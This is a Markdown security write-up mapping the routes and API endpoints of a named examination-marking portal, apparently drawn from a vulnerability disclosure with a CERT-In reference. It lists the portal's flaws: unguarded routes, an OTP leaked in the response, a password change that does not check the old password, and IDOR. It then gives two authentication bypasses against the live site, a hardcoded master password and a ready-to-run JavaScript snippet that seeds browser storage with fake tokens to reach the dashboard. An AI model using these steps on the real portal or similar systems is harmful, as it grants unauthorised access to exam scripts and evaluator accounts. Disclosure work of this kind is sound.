# API Surface Documentation

## CBSE OSM Portal (`cbse.onmark.co.in/cbseevalweb/`)

### Base URL
```
https://cbse.onmark.co.in/cbseevalweb/
```

### Angular Routes (Client-Side, no server-side route guards)
| Route | Description | Auth Required |
|-------|-------------|---------------|
| `/#/login` | Login page | No |
| `/#/dashboard` | Main evaluation dashboard | No (route guard missing) |
| `/#/evalscriptsview` | View assigned answer scripts | No |
| `/#/heallscripts` | View all scripts | No |
| `/#/evaluatordetails` | Evaluator information | No |
| `/#/verificationdashboard` | Verification dashboard | No |
| `/#/profile` | User profile | No |

### API Endpoints (extracted from vulnerability disclosure)

#### Authentication
| Endpoint | Method | Notes |
|----------|--------|-------|
| Login endpoint | POST | Returns OTP in response body (V2) |
| OTP verification | POST | Client-side only — server not involved |

#### Password Management
| Endpoint | Method | Payload | Vulnerability |
|----------|--------|---------|---------------|
| `ChangePassword` | POST | `{ ValuatorID, pin_NewPassword }` | Old password NOT sent/verified (V4) |

#### User Operations (IDOR-affected)
| Endpoint | Method | Identity Source | Vulnerability |
|----------|--------|-----------------|---------------|
| Various evaluation APIs | POST | `sessionStorage["eval"].ValuatorID` | Server trusts client-sent ID (V5) |

### Authentication Bypass Methods

**Method 1: Master Password (V1)**
```
Enter master password from JS bundle → OTP auto-filled → full dashboard access
```

**Method 2: Storage Seeding (V3)**
```javascript
localStorage.setItem('jwtToken', 'dev-token-12345');
sessionStorage.setItem('role_id', '23');
sessionStorage.setItem('ValType', 'Regular');
sessionStorage.setItem('eval', JSON.stringify({
  user_id: 'DEV001',
  role_id: '23',
  mobile_no: '9999999999',
  email: '[email protected]',
  jwtToken: 'dev-token-12345'
}));
window.location.href = '/cbseevalweb/#/dashboard';
```

### Frontend Bundle
```
https://cbse.onmark.co.in/cbseevalweb/main.dc17c24606b3b008.js
```
- Contains hardcoded master password
- Contains client-side OTP comparison logic
- Publicly accessible without authentication

### CERT-In Reference
- Ref: CERTIn-16590126
- Reported: February 2026
- Reporter: Nisarga Adhikary

### Other Onmark Subdomains
Per Nisarga's research, all `*.onmark.co.in` subdomains resolve to the same load balancer. The same vulnerabilities exist across subdomains serving other examination boards.